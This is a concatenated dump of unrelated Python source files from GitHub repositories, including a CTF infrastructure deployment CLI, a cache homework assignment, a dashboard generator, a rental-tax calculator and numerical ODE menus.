string_between(process.stdout, 'Creating token ', '')\n\n if token is None:\n raise ValueError(f'Failed to create token: {process.stderr}')\n\n return token\n\n\ndef create_token_account(token):\n command = ['spl-token', 'create-account', token]\n logger.info(f\"Creating token account for {token}.\")\n process = run_command(command)\n if process.returncode != 0:\n raise RuntimeError(f'Failed to create token account for {token}.')\n\n logger.info(f'Successfully created token account for {token}.')\n\n\ndef mint_token(token, amount):\n command = ['spl-token', 'mint', token, str(amount)]\n logger.info(f'Minting {amount} of token {token}.')\n process = run_command(command)\n if process.returncode != 0:\n logger.warning(f'Minting {amount} of {token} failed! {process.stderr}')\n sys.exit(0)\n logger.info(f'Successfully minted {amount} of {token}.')\n\n\ndef create_wl_token(amount, cluster):\n # Confirm RPC Is Correct\n confirm_rpc(cluster)\n\n # Create Token and Token Account\n token = create_token_mint()\n create_token_account(token)\n\n # Wait for Token Account Confirmation\n time.sleep(5)\n\n mint_token(token.strip(), amount)\n return token\n","repo_name":"akajimeagle/nftools","sub_path":"nftools/create_whitelist_token.py","file_name":"create_whitelist_token.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27099177264","text":"from bson import ObjectId\nfrom src.app.services.styleHandler import check_dashboard_visualization_style, \\\n create_dashboards_for_grafana, create_dashboards_for_kibana\nfrom src.app.services.http_dispatcher import post_grafana_dashboard, post_kibana_dashboard\nfrom src.app.services.grafana_renderer import *\nfrom src.app.services.kibana_renderer import *\nimport os\nfrom src.app.utils.logger import get_logger\nimport json\n\n\nlogger = get_logger(__name__)\n\n\ndef meta_model_interpreter(message):\n meta_model = json.loads(message)\n viz_tool = os.environ.get('SELECTED_TOOL')\n selected_datasource = os.environ.get('SELECTED_DATASOURCE')\n dashboard_style = 'null'\n model_uid = 'null'\n dashboards = []\n\n for meta_model_key, meta_model_value in meta_model.items():\n if meta_model_key == \"_id\":\n model_uid = ObjectId(meta_model_value)\n elif meta_model_key == \"dashboardpages\":\n dashboard_style = check_dashboard_visualization_style(meta_model_value)\n if viz_tool == 'grafana':\n dashboards = create_dashboards_for_grafana(meta_model_value, dashboard_style, model_uid, selected_datasource)\n else:\n dashboards = create_dashboards_for_kibana(meta_model_value, dashboard_style, model_uid, selected_datasource)\n logger.debug(\"Meta Model Interpreted \")\n logger.debug(\"Style Recognized!\")\n logger.debug(dashboard_style)\n logger.debug(\"Panels Created\")\n logger.debug(\"Final Dashboards Ready\")\n if viz_tool == 'grafana':\n if selected_datasource == 'Elasticsearch':\n final_dashboards = load_grafana_templates(dashboards, dashboard_style, 'Elasticsearch')\n if selected_datasource == 'Prometheus':\n final_dashboards = load_grafana_templates(dashboards, dashboard_style, 'Prometheus')\n else:\n final_dashboards = load_kibana_templates(dashboards, dashboard_style, 'Elasticsearch')\n return dashboards\n\n\n\n\n\n\n","repo_name":"omarghetti/Dynamic-Dashboard-Generator","sub_path":"src/app/services/MetaModelInterpreter.py","file_name":"MetaModelInterpreter.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31956760367","text":"import sys\nfrom os import getcwd\nfrom os.path import join\nfrom re import findall\n\nimport git # type: ignore\nimport click\nimport yaml\nfrom click.core import Context\nfrom yaspin import yaspin # type: ignore\nfrom marshmallow_dataclass import class_schema\n\nfrom ctfkit.constants import SPINNER_SUCCESS, SPINNER_FAIL, SPINNER_MODEL\nfrom ctfkit.models import HostingEnvironment, HostingProvider\nfrom ctfkit.models.ctf_config import CtfConfig, DeploymentConfig, GcpConfig\nfrom ctfkit.utility import ConfigLoader, mkdir, touch, is_slug\n\nfrom ctfkit.manager.vpn_manager import VPNManager\n\n\npass_config = click.make_pass_decorator(CtfConfig)\n\nCtfDeployment = None\n\n@click.group()\n@click.pass_context\ndef cli(context: Context):\n \"\"\"Manage your CTF infrastructure\"\"\"\n global CtfDeployment\n from ctfkit.terraform import CtfDeployment\n\n@cli.command('init')\n@click.option(\"-n\", \"--ctf-name\", type=str, prompt=True)\n@click.option('-p', '--provider', prompt=True,\n type=click.Choice(list(map(lambda e: e.value, HostingProvider))))\ndef init(ctf_name: str, provider: str) -> None:\n \"\"\"\n Create a CTF repository in the current working directory\n\n :param ctf_name: The name of the CTF\n :param provider: The provider which will host the CTF\n \"\"\"\n # Check if the given name is valid\n if not is_slug(ctf_name):\n sys.exit(1)\n\n path = getcwd()\n ctf_path = join(path, ctf_name)\n\n # Create the CTF's directory\n mkdir(ctf_path)\n\n # Init the CTF git repo\n repo = git.Repo.init(ctf_path)\n\n # One CTF directory will be like so:\n # /ctf_name/\n # challenges/ # all challenges hosted on the CTF\n # config/ # the configuration files of the CTF\n # README.md # a dummy README file to introduce the CTF\n\n # We initiate the CTF's directory with default files\n readme_default_file = \"README.md\"\n default_dirs = [\"challenges\"]\n default_files = [readme_default_file, 'ctf.yaml']\n\n # Create all directories with .gitkeep file to preserve them if empty\n for default in default_dirs:\n dir_ = join(ctf_path, default)\n mkdir(dir_)\n gitkeep = join(dir_, \".gitkeep\")\n touch(gitkeep)\n repo.index.add(gitkeep)\n\n # Create all files and add them into the repo\n for default in default_files:\n file_path = join(ctf_path, default)\n touch(file_path)\n # Fill the README file with default content\n if default == readme_default_file:\n with open(file_path, 'w') as file_:\n file_.write(f\"# [CTF Kit] {ctf_name}\\n\")\n \n elif default == \"ctf.yaml\":\n config = CtfConfig(\n kind='ctf',\n name=ctf_name,\n deployments=[DeploymentConfig(\n internal_domain=f'{ctf_name}.ctf',\n environment=HostingEnvironment.TESTING,\n provider=HostingProvider.GCP,\n gcp=GcpConfig(\n project='change-this-123',\n machine_type='e1-standard-2',\n region='europe-west1',\n zone='europe-west1-b'\n )\n )]\n )\n with open(file_path, 'w') as file_:\n file_.write(yaml.dump(class_schema(CtfConfig)().dump(obj=config), sort_keys=False))\n\n repo.index.add(default_files)\n\n repo.index.commit(f\"CTF Kit ctf '{ctf_name}' initial commit\")\n print(f\"Done! You can check it at {ctf_path}\")\n\n\n@cli.command('plan')\n@click.argument('environment', required=True,\n type=click.Choice([ e.value for e in HostingEnvironment ]))\n@click.option(\"--config\",\n type=str,\n default=\"ctf\")\ndef plan(config: str, environment: str):\n \"\"\"\n List planned infrastructure modifications\n\n Generate terraform configuration and list planned addition, deletion and modification\n \"\"\"\n\n ctf_config = ConfigLoader(CtfConfig).convert(config)\n\n environment_e = next(\n elem for elem in HostingEnvironment if elem.value == environment)\n\n # Prepare clients private keys\n VPNManager.generate_clients_private(ctf_config.teams)\n\n # Declare our terraform stack\n app = create_deployment(ctf_config, environment_e)\n\n helpers = TfHelpers(app)\n\n helpers.synth()\n helpers.init()\n helpers.plan()\n\n\n@cli.command('deploy')\n@click.argument('environment', required=True,\n type=click.Choice([ e.value for e in HostingEnvironment ]))\n@click.option(\"--config\",\n type=str,\n default=\"ctf\")\ndef deploy(config: str, environment: str):\n \"\"\"\n Generate terraform configuration files\n from the ctf configuration and deploy required changes\n \"\"\"\n\n config = ConfigLoader(CtfConfig).convert(config)\n\n # Find the requested environment\n environment_e = next(\n elem for elem in HostingEnvironment if elem.value == environment)\n\n # Prepare clients private keys\n VPNManager.generate_clients_private(config.teams)\n\n # Declare our terraform stack\n app = CtfDeployment(config, environment_e, outdir=join(getcwd(), '.tfout', environment))\n helpers = TfHelpers(app)\n\n helpers.synth()\n helpers.init()\n helpers.deploy()\n\n # Extract outputs from deployement\n outputs = app.get_outputs()\n if 'servers' in outputs:\n with yaspin(SPINNER_MODEL, text='Generating VPN configurations ...'):\n servers = outputs['servers']['value']\n services_cidr = outputs['services_cidr']['value']\n\n VPNManager.generate_clients_config(config.teams, servers, services_cidr)\n\n\n@cli.command('destroy')\n@click.argument('environment', required=True,\n type=click.Choice([ e.value for e in HostingEnvironment ]))\n@click.option(\"--config\",\n type=str,\n default=\"ctf\")\ndef destroy(config: CtfConfig, environment: str):\n \"\"\"\n Generate terraform configuration files\n from the ctf configuration and deploy required changes\n \"\"\"\n\n config = ConfigLoader(CtfConfig).convert(config)\n\n # Find the requested environment\n environment_e = next(\n elem for elem in HostingEnvironment if elem.value == environment)\n\n # Prepare clients private keys\n VPNManager.generate_clients_private(config.teams)\n\n app = CtfDeployment(config, environment_e, outdir=join(getcwd(), '.tfout', environment))\n\n helpers = TfHelpers(app)\n\n helpers.synth()\n helpers.init()\n helpers.destroy()\n\n\n\ndef create_deployment(config: CtfConfig, environment: HostingEnvironment) -> any:\n outdir = join(getcwd(), '.tfout', environment.value)\n mkdir(outdir)\n\n return CtfDeployment(config, environment, outdir=outdir)\n\nclass TfHelpers:\n \"\"\"\n Infrastructure related helpers\n \"\"\"\n\n infra: any\n\n def __init__(self, infra: any) -> None:\n self.infra = infra\n\n def init(self) -> None:\n \"\"\"\n Wrap call to terraform init with a spinner\n \"\"\"\n\n with yaspin(SPINNER_MODEL, text=\"Downloading modules ...\") as spinner:\n _, stderr = self.infra.init()\n\n if len(stderr) > 0:\n spinner.fail(SPINNER_FAIL + stderr)\n else:\n spinner.ok(SPINNER_SUCCESS)\n\n def synth(self) -> None:\n \"\"\"\n Wrap call to terraformcdk synth() method while showing a spinner\n \"\"\"\n with yaspin(SPINNER_MODEL, text=\"Generating infrastructure configuration ...\") as spinner:\n mkdir('.tfout')\n self.infra.synth()\n spinner.ok(SPINNER_SUCCESS)\n\n def plan(self) -> None:\n \"\"\"\n Wrap call to terraform plan and show result on spinner\n \"\"\"\n\n text = \"Planning infrastructure ...\"\n with yaspin(SPINNER_MODEL, text=text) as spinner:\n\n def handle_line(line: str) -> None:\n if line != '':\n spinner.text = text + line.strip('\\n')\n\n exit_code, stdout, _ = self.infra.plan(stdout_cb=handle_line)\n\n if exit_code == 0:\n spinner.ok(SPINNER_SUCCESS)\n print('\\n'.join(findall(r'(.+resource \"[^\"]+\" \"[^\"]+\") \\{', stdout)))\n else:\n spinner.fail(SPINNER_FAIL + f'Command exited with code {exit_code}')\n\n def deploy(self) -> None:\n \"\"\"\n Wrap call to terraform apply while showing stdout on a spinner\n \"\"\"\n\n with yaspin(SPINNER_MODEL, text='Starting terraform ...') as spinner:\n\n def handle_line(line: str) -> None:\n if line != '':\n spinner.text = 'Deploying infrastructure : ' + line.strip('\\n')\n\n exit_code, _, _ = self.infra.apply(stdout_cb=handle_line)\n\n if exit_code == 0:\n spinner.ok(SPINNER_SUCCESS)\n else:\n spinner.fail(f'{SPINNER_FAIL} Command exited with code {exit_code}')\n\n def destroy(self) -> None:\n \"\"\"\n Wrap a call to terraform destroy while showing stdout on a spinner\n \"\"\"\n\n text = \"Destroying infrastructure ...\"\n with yaspin(SPINNER_MODEL, text=text) as spinner:\n\n def handle_line(line: str) -> None:\n if line != '':\n spinner.text = text + line.strip('\\n')\n\n exit_code, _, _ = self.infra.destroy(stdout_cb=handle_line)\n\n if exit_code == 0:\n spinner.ok(SPINNER_SUCCESS)\n else:\n spinner.fail(f'{SPINNER_FAIL} Command exited with code {exit_code}')\n","repo_name":"Team-FakeNews/CTFKit","sub_path":"ctfkit/cli/ctf.py","file_name":"ctf.py","file_ext":"py","file_size_in_byte":9505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"21731634717","text":"print(\"INFO \\n Dette programmet besvarer om din utleie av egen bolig er skattepliktig.\\n Først trenger vi å vite hvor stor del av boligen du har leid ut.\\n Angi dette i prosent, 100 betye hele boligen, 50 betyr halve, \\n 20 er mindre del av boligen som f.eks. en hybel.\")\r\n\r\nrentType = input(\"Leier du ut egen bolig (E/e), Sekundærbolig (S/s), eller Fritidsbolig (F/f)?\")\r\nvacationPurpose = \"\"\r\nvacationHouses = 0\r\nvacationIncome = 0\r\nvacationLimit = 10000\r\n\r\ntaxExceeding = 0\r\ntaxPrHouse = 0\r\ntaxTotal = 0\r\n\r\nrentPercent = 0\r\nrentYear = 0\r\nrentLimit = 20000\r\n\r\n\r\n\r\nif rentType == \"E\" or rentType == \"e\":\r\n rentPercent = int(input(\"Oppgi, i prosent, hvor mye av boligen som ble utleid: \"))\r\n rentYear = int(input(\"Skriv inn hva du har hatt i leieinntekt: \"))\r\n\r\n if rentPercent < 50:\r\n print(\"Inntekten er ikke skattepliktig.\")\r\n if rentYear >= rentLimit:\r\n print(\"Inntekten er skattepliktig.\\nSkattepliktigbeløp er: \", rentYear)\r\n\r\n elif rentYear >= rentLimit:\r\n print(\"Inntekten er skattepliktig.\\nSkattepliktigbeløp er: \", rentYear)\r\nelif rentType == \"S\" or rentType == \"s\":\r\n print(\"lol\")\r\nelif rentType == \"F\" or rentType == \"f\":\r\n vacationPurpose = input(\"Skriv inn formålet med fritidboligen(e) (Fritid/Utleie): \")\r\n vacationHouses = int(input(\"Skriv inn hvor mange fritidsboliger du leier ut: \"))\r\n vacationIncome = int(input(\"Skriv inn utleieinntekten pr. fritidsbolig: \"))\r\n\r\n if vacationPurpose == \"Fritid\" or vacationPurpose == \"fritid\":\r\n print(\"\")\r\n\r\n","repo_name":"HHorge/ITGK","sub_path":"ITGK Øving 2/Skatteetaten.py","file_name":"Skatteetaten.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72504317315","text":"# HW4\n#Due Date: 04/17/2021, 11:59PM\n# Isha Thukral\n\n\"\"\" \n### Collaboration Statement: Worked with TA (chandu)\n \n\"\"\"\nclass Node:\n def __init__(self, content):\n self.value = content\n self.next = None\n\n def __str__(self):\n return ('CONTENT:{}\\n'.format(self.value))\n\n __repr__=__str__\n\n\nclass ContentItem:\n '''\n >>> content1 = ContentItem(1000, 10, \"Content-Type: 0\", \"0xA\")\n >>> content2 = ContentItem(1004, 50, \"Content-Type: 1\", \"110010\")\n >>> content3 = ContentItem(1005, 18, \"Content-Type: 2\", \"

'CMPSC132'

\")\n >>> content4 = ContentItem(1005, 18, \"another header\", \"111110\")\n >>> hash(content1)\n 0\n >>> hash(content2)\n 1\n >>> hash(content3)\n 2\n >>> hash(content4)\n 1\n '''\n def __init__(self, cid, size, header, content):\n self.cid = cid\n self.size = size\n self.header = header\n self.content = content\n\n def __str__(self):\n return f'CONTENT ID: {self.cid} SIZE: {self.size} HEADER: {self.header} CONTENT: {self.content}'\n\n __repr__=__str__\n\n def __eq__(self, other):\n if isinstance(other, ContentItem):\n return self.cid == other.cid and self.size == other.size and self.header == other.header and self.content == other.content\n return False\n\n def __hash__(self):\n # YOUR CODE STARTS HERE\n sum = 0\n for c in self.header:\n sum += ord(c)\n return sum %3 #0,1,2\n\n\n\nclass CacheList:\n ''' \n # An extended version available on Canvas. Make sure you pass this doctest first before running the extended version\n\n >>> content1 = ContentItem(1000, 10, \"Content-Type: 0\", \"0xA\")\n >>> content2 = ContentItem(1004, 50, \"Content-Type: 1\", \"110010\")\n >>> content3 = ContentItem(1005, 180, \"Content-Type: 2\", \"

'CMPSC132'

\")\n >>> content4 = ContentItem(1006, 18, \"another header\", \"111110\")\n >>> content5 = ContentItem(1008, 2, \"items\", \"11x1110\")\n >>> lst=CacheList(200)\n >>> lst\n REMAINING SPACE:200\n ITEMS:0\n LIST:\n \n >>> lst.put(content1, 'mru')\n 'INSERTED: CONTENT ID: 1000 SIZE: 10 HEADER: Content-Type: 0 CONTENT: 0xA'\n >>> lst.put(content2, 'lru')\n 'INSERTED: CONTENT ID: 1004 SIZE: 50 HEADER: Content-Type: 1 CONTENT: 110010'\n >>> lst.put(content4, 'mru')\n 'INSERTED: CONTENT ID: 1006 SIZE: 18 HEADER: another header CONTENT: 111110'\n >>> lst.put(content5, 'mru')\n 'INSERTED: CONTENT ID: 1008 SIZE: 2 HEADER: items CONTENT: 11x1110'\n >>> lst.put(content3, 'lru')\n \"INSERTED: CONTENT ID: 1005 SIZE: 180 HEADER: Content-Type: 2 CONTENT:

'CMPSC132'

\"\n >>> lst.put(content1, 'mru')\n 'INSERTED: CONTENT ID: 1000 SIZE: 10 HEADER: Content-Type: 0 CONTENT: 0xA'\n >>> 1006 in lst\n True\n >>> contentExtra = ContentItem(1034, 2, \"items\", \"other content\")\n >>> lst.update(1008, contentExtra)\n 'UPDATED: CONTENT ID: 1034 SIZE: 2 HEADER: items CONTENT: other content'\n >>> lst\n REMAINING SPACE:170\n ITEMS:3\n LIST:\n [CONTENT ID: 1034 SIZE: 2 HEADER: items CONTENT: other content]\n [CONTENT ID: 1006 SIZE: 18 HEADER: another header CONTENT: 111110]\n [CONTENT ID: 1000 SIZE: 10 HEADER: Content-Type: 0 CONTENT: 0xA]\n \n >>> lst.clear()\n 'Cleared cache!'\n >>> lst\n REMAINING SPACE:200\n ITEMS:0\n LIST:\n \n '''\n def __init__(self, size):\n self.head = None\n self.maxSize = size\n self.remainingSpace = size\n self.numItems = 0\n\n def __str__(self):\n listString = \"\"\n current = self.head\n while current is not None:\n listString += \"[\" + str(current.value) + \"]\\n\"\n current = current.next\n return 'REMAINING SPACE:{}\\nITEMS:{}\\nLIST:\\n{}'.format(self.remainingSpace, self.numItems, listString) \n\n __repr__=__str__\n\n def __len__(self):\n return self.numItems\n \n def put(self, content, evictionPolicy):\n # YOUR CODE STARTS HERE\n\n #use contains \n if content.cid in self: # already present\n return f\"Content {content.cid} already in cache, insertion not allowed\" \n if content.size > self.maxSize: # if its greater than maxSize\n return \"Insertion not allowed\"\n \n contentNode = Node(content)\n\n\n if content.size > self.remainingSpace: # have to get rid of most first or last depending on evicition\n # evictionPolicy\n if evictionPolicy == 'lru': #Removes the last (least recently used\n while not content.size <= self.remainingSpace:\n self.lruEvict()\n\n else:\n while not content.size <= self.remainingSpace: # else most recently used\n self.mruEvict()\n \n contentNode.next = self.head # readjusting head\n self.head = contentNode \n self.numItems += 1 # icreasing num of items \n self.remainingSpace -= content.size # and decreasing the remaining space\n \n return \"INSERTED: \"+str(content)\n \n def __contains__(self, cid):\n # YOUR CODE STARTS HERE\n if self.numItems == 0:\n return False\n\n prev = None\n curr = self.head\n if self.head.value.cid == cid: # finding if Content Item is in list by id\n return True\n\n while curr: # using while loop till the item is the head\n if curr.value.cid == cid:\n\n prev.next = curr.next\n curr.next = self.head\n self.head = curr\n return True\n \n prev = curr\n curr = curr.next\n\n return False\n\n\n def update(self, cid, content):\n # YOUR CODE STARTS HERE\n if cid in self:\n if self.remainingSpace + self.head.value.size >= content.size: # while remaining space and size is greater than content\n self.remainingSpace = self.remainingSpace + self.head.value.size - content.size # us put in list and subtract remaining space\n self.head.value = content # updates to the head\n return \"UPDATED: \"+str(content)\n else:\n return \"Cache miss!\"\n else:\n return \"Cache miss!\"\n\n\n def mruEvict(self):\n # YOUR CODE STARTS HERE\n # removes the first node\n prevhead = self.head\n\n self.head = self.head.next # making next item head\n\n self.remainingSpace += prevhead.value.size # increasing remaing space\n self.numItems -= 1 # decrease number of items\n return \"REMOVED: \"+str(prevhead.value) \n\n \n def lruEvict(self):\n # YOUR CODE STARTS HERE\n # remove the last node\n curr = self.head\n prev = None\n while curr.next: # traverse till curr.next doesn't equal none\n prev = curr # making item before the last node\n curr = curr.next # and current equal to none \n \n if curr == self.head:\n self.head = None\n else:\n prev.next = None\n\n self.remainingSpace += curr.value.size # same as above \n self.numItems -= 1\n return \"REMOVED: \"+str(curr.value) \n\n\n \n def clear(self):\n # YOUR CODE STARTS HERE\n # Removes all items from the list.\n self.head = None\n self.numItems = 0\n self.remainingSpace = self.maxSize\n return \"Cleared cache!\"\n\n\nclass Cache:\n \"\"\"\n # An extended version available on Canvas. Make sure you pass this doctest first before running the extended version\n\n >>> cache = Cache()\n >>> content1 = ContentItem(1000, 10, \"Content-Type: 0\", \"0xA\")\n >>> content2 = ContentItem(1003, 13, \"Content-Type: 0\", \"0xD\")\n >>> content3 = ContentItem(1008, 242, \"Content-Type: 0\", \"0xF2\")\n\n >>> content4 = ContentItem(1004, 50, \"Content-Type: 1\", \"110010\")\n >>> content5 = ContentItem(1001, 51, \"Content-Type: 1\", \"110011\")\n >>> content6 = ContentItem(1007, 155, \"Content-Type: 1\", \"10011011\")\n\n >>> content7 = ContentItem(1005, 18, \"Content-Type: 2\", \"

'CMPSC132'

\")\n >>> content8 = ContentItem(1002, 14, \"Content-Type: 2\", \"

'PSU'

\")\n >>> content9 = ContentItem(1006, 170, \"Content-Type: 2\", \"\")\n\n >>> cache.insert(content1, 'lru')\n 'INSERTED: CONTENT ID: 1000 SIZE: 10 HEADER: Content-Type: 0 CONTENT: 0xA'\n >>> cache.insert(content2, 'lru')\n 'INSERTED: CONTENT ID: 1003 SIZE: 13 HEADER: Content-Type: 0 CONTENT: 0xD'\n >>> cache.insert(content3, 'lru')\n 'Insertion not allowed'\n\n >>> cache.insert(content4, 'lru')\n 'INSERTED: CONTENT ID: 1004 SIZE: 50 HEADER: Content-Type: 1 CONTENT: 110010'\n >>> cache.insert(content5, 'lru')\n 'INSERTED: CONTENT ID: 1001 SIZE: 51 HEADER: Content-Type: 1 CONTENT: 110011'\n >>> cache.insert(content6, 'lru')\n 'INSERTED: CONTENT ID: 1007 SIZE: 155 HEADER: Content-Type: 1 CONTENT: 10011011'\n\n >>> cache.insert(content7, 'lru')\n \"INSERTED: CONTENT ID: 1005 SIZE: 18 HEADER: Content-Type: 2 CONTENT:

'CMPSC132'

\"\n >>> cache.insert(content8, 'lru')\n \"INSERTED: CONTENT ID: 1002 SIZE: 14 HEADER: Content-Type: 2 CONTENT:

'PSU'

\"\n >>> cache.insert(content9, 'lru')\n \"INSERTED: CONTENT ID: 1006 SIZE: 170 HEADER: Content-Type: 2 CONTENT: \"\n >>> cache\n L1 CACHE:\n REMAINING SPACE:177\n ITEMS:2\n LIST:\n [CONTENT ID: 1003 SIZE: 13 HEADER: Content-Type: 0 CONTENT: 0xD]\n [CONTENT ID: 1000 SIZE: 10 HEADER: Content-Type: 0 CONTENT: 0xA]\n \n L2 CACHE:\n REMAINING SPACE:45\n ITEMS:1\n LIST:\n [CONTENT ID: 1007 SIZE: 155 HEADER: Content-Type: 1 CONTENT: 10011011]\n \n L3 CACHE:\n REMAINING SPACE:16\n ITEMS:2\n LIST:\n [CONTENT ID: 1006 SIZE: 170 HEADER: Content-Type: 2 CONTENT: ]\n [CONTENT ID: 1002 SIZE: 14 HEADER: Content-Type: 2 CONTENT:

'PSU'

]\n \n \n \"\"\"\n\n def __init__(self):\n self.hierarchy = [CacheList(200), CacheList(200), CacheList(200)]\n self.size = 3\n \n def __str__(self):\n return ('L1 CACHE:\\n{}\\nL2 CACHE:\\n{}\\nL3 CACHE:\\n{}\\n'.format(self.hierarchy[0], self.hierarchy[1], self.hierarchy[2]))\n \n __repr__=__str__\n\n\n def clear(self):\n for item in self.hierarchy:\n item.clear()\n return 'Cache cleared!'\n\n \n def insert(self, content, evictionPolicy):\n # YOUR CODE STARTS HERE\n # insert item into the correct level\n level = hash(content) \n return self.hierarchy[level].put(content,evictionPolicy) # this is done through hierarchy\n # putting the content based on eviction policy \n\n def __getitem__(self, content):\n # YOUR CODE STARTS HERE\n level = hash(content)\n if content.cid in self.hierarchy[level]: #invokes __contains__ method\n return self.hierarchy[level].head.value\n else:\n return \"Cache miss!\"\n\n\n\n def updateContent(self, content):\n # YOUR CODE STARTS HERE\n level = hash(context)\n # upadting invoking __contains__ method\n return self.hierarchy[level].update(content.cid, content) ","repo_name":"ithukral/Isha-Coding-Projects-","sub_path":"Intership Code/HW4.py","file_name":"HW4.py","file_ext":"py","file_size_in_byte":11800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9240358661","text":"import os\n\n\nexclude_dir = {'编程资料'}\n\n\ndef scan_file(path, level, target):\n filenames = os.listdir(path) # 返回path目录下的所有文件名称\n for filename in filenames:\n cur_path = path + \"/\" + filename\n if level == 0:\n cur_path = filename\n if os.path.isdir(cur_path): # 子文件\n target.write(\"{blank}- {dir_name}\\n\".format(blank=' ' * 2 * level, dir_name=filename))\n scan_file(cur_path, level + 1, target)\n elif level != 0 and filename[0] != '.' and filename.endswith('.md'):\n target.write(\"{blank}- [{filename}]({cur_path})\\n\".format(blank=' ' * 2 * level, filename=filename,\n cur_path=cur_path))\n\n\n# 生成sidebar 文件\ndef gen_sidebar():\n print(\"开始生成sidebar文件\\n\")\n os.chdir('docs')\n with open(\"_sidebar.md\", \"w\", encoding='utf-8') as f:\n scan_file(\".\", 0, f)\n\n\nif __name__ == '__main__':\n gen_sidebar()\n","repo_name":"yanleiwang/yanleiwang.github.io","sub_path":"deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1188091267","text":"# Menu selector of milestone 4\n\n\n\nfrom common.config import Config\nfrom common.menu import Menu\n\nfrom common import schemes\nfrom common.config import Config\nfrom common.odes import Cauchy\nfrom common.physics import Oscilador\nfrom common.stability import RegionEstabilidad\nfrom matplotlib import pyplot as plt\nfrom numpy import array, linspace, cos, sin, absolute\nfrom typing import Callable\n\n\n\ndef menu():\n menu = Menu()\n\n menu.additem(\"oscil\", 1, \"Calculate oscilator movement\", oscilmenu)\n menu.additem(\"region\", 2, \"Visualize Stability Region\", regionmenu)\n\n menu.menu()\n\ndef oscilmenu():\n menu = Menu()\n\n menu.additem(\"eu\", 1, \"Euler\", lambda : oscillator(schemes.Euler) )\n menu.additem(\"ie\", 2, \"Inverse Euler\", lambda : oscillator(schemes.EulerInverso) )\n menu.additem(\"ie\", 3, \"Crank Nicolson\", lambda : oscillator(schemes.CrankNicolson))\n menu.additem(\"ie\", 4, \"Runge-Kutta 4\", lambda : oscillator(schemes.RungeKutta) )\n menu.additem(\"ie\", 5, \"Leap-Frog\", lambda : oscillator(schemes.LeapFrog) )\n\n menu.menu()\n\ndef regionmenu():\n menu = Menu()\n\n menu.additem(\"eu\", 1, \"Stability Region of Euler\", lambda : region(schemes.Euler) )\n menu.additem(\"ie\", 2, \"Stability Region of Inverse Euler\", lambda : region(schemes.EulerInverso) )\n menu.additem(\"ie\", 3, \"Stability Region of Crank Nicolson\", lambda : region(schemes.CrankNicolson))\n menu.additem(\"ie\", 4, \"Stability Region of Runge-Kutta 4\", lambda : region(schemes.RungeKutta) )\n #menu.additem(\"ie\", 5, \"Stability Region of Leap-Frog\", lambda : region(LeapFrogModified) )\n\n menu.menu()\n\n\ndef oscillator(scheme: Callable):\n # Default configuration.\n N = 100\n U0 = array([1,0]) \n t = linspace(0, 10, N)\n\n U = Cauchy( U0, t, Oscilador, scheme)\n\n fig, (xax, vax) = plt.subplots(1, 2)\n\n xax.plot(t, U[:,0],\"r\", label = \"Solución Numérica\")\n xax.plot(t, cos(t),\"--\",color = \"r\", label = \"Solución Analítica\")\n\n vax.plot(t, U[:,1],\"g\", label = \"Velocidad Numérica\")\n vax.plot(t, -sin(t),\"--\",color = \"g\", label = \"Velocidad Analítica\")\n\n plt.title(f\"Oscilador Armónico para esquema {scheme.__name__}\")\n\n xax.set_xlabel(\"t\")\n xax.set_ylabel(\"x(t)\")\n xax.legend(loc=\"lower left\")\n\n vax.set_xlabel(\"t\")\n vax.set_ylabel(\"v(t)\")\n vax.legend(loc=\"lower left\")\n\n xax.grid()\n plt.show()\n\n\n\ndef region(scheme: Callable):\n # Default configuration.\n N = 100\n X = linspace(-5, 5, N)\n Y = linspace(-5, 5, N)\n\n # Calculate the stability region.\n region = absolute( RegionEstabilidad(scheme) )\n\n # Plot the stability region.\n CSF = plt.contourf(X, Y, region, levels=[0,1], colors=['#E0E0E0'])\n #CS = plt.contour(X, Y, region, levels = [0.25, 0.5, 0.75, 1, 1.25, 1.5])\n CS = plt.contour(X, Y, region, levels = [0.1 * (i+1) for i in range(15)])\n\n plt.title(f'Region de Estabilidad Absoluta de {scheme.__name__}')\n plt.xlabel('Re(|r|)')\n plt.ylabel('Im(|r|)')\n\n plt.xlim([-5, 5])\n plt.ylim([-5, 5])\n\n plt.legend(loc = \"lower left\")\n\n plt.grid()\n plt.show()\n","repo_name":"jahrTeaching/milestones-agserWork","sub_path":"sources/milestone4/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14929289146","text":"from joblib import load\nimport numpy as np\n\n# Weight factors\na_1 = 1\na_2 = 1 \na_3 = 1\n\n# Working directory\nwkdir = r\"C:\\TEMP\\Dymola\"\n\n\ndef agent_1():\n # Load the classifier: returns trajectory class\n clf = load(wkdir + r\"\\heater-clf.joblib\")\n\n # Load the cost of each class\n cost_clf = load(wkdir + r\"\\cost-clf.joblib\")\n av_clf = load(wkdir + r\"\\av-clf.joblib\")\n prob_dic = {1:0.1,2:0.3,3:0.1,4:0.5}\n\n return clf, prob_dic, cost_clf, av_clf\n\ndef agent_2(input, probs):\n \n # Standard sequences used for this case study\n seq = [[0,0],[100,100],[45,35],[60,50],[30,20],[50,50],[20,20]]\n min_cost = []\n\n # Load the subsystem model and the corresponding scaler\n MLPModel = load(wkdir + r\"\\heater.joblib\")\n scaler = load(wkdir + r\"\\heater_scaler.joblib\")\n\n # Get all the information from the other agent\n clf, prob_dic, cost_clf, av_clf = agent_1()\n\n \n for l,w in enumerate(input):\n cost = []\n kl = []\n for k,u in enumerate(seq):\n count_c = 0\n command = []\n Temp = []\n x_train =[]\n v = []\n tim_con = 10\n\n for t in range(70):\n\n if t < 10:\n com = 0\n elif t < 40:\n com = u[0]\n else:\n com = u[1]\n\n Temp.append(w)\n\n if t > 0:\n if abs(com-command[-1])>0.001:\n if count_c < tim_con:\n command.append(command[-1] + 